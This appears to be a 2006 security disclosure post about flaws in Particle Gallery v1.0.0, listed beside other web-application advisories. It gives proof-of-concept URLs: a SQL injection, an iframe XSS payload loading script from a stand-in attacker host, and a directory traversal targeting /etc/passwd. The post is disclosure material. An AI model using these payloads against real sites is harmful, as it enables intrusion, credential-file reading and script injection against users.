Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Calendar Express 2 SQL injection [SA20465] Coppermine Photo Gallery usermgr.php Unspecified Vulnerability [SA20475] MiraksGalerie Multiple File Inclusion Vulnerabilities [SA20436] PyBlosxom Contributed Packages Cross-Site Scripting Vulnerability From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com> Date:07.06.2006Subject:Particle Gallery v1.0.0Homepage: http://www.particlesoft.net/particlegallery/ Effected files: viewimage.php viewalbum.php SQL Injection: http://www.example.com/viewimage.php?imageid=' XSS Vulnerability proof of concept: http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsite .com/scriptlet.html> Possible Directory Traversal ?: http://www.example.com/viewalbum.php?albumid=../../../../etc/passwd/
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Calendar Express 2 SQL injection
[SA20465] Coppermine Photo Gallery usermgr.php Unspecified Vulnerability
[SA20475] MiraksGalerie Multiple File Inclusion Vulnerabilities
[SA20436] PyBlosxom Contributed Packages Cross-Site Scripting Vulnerability
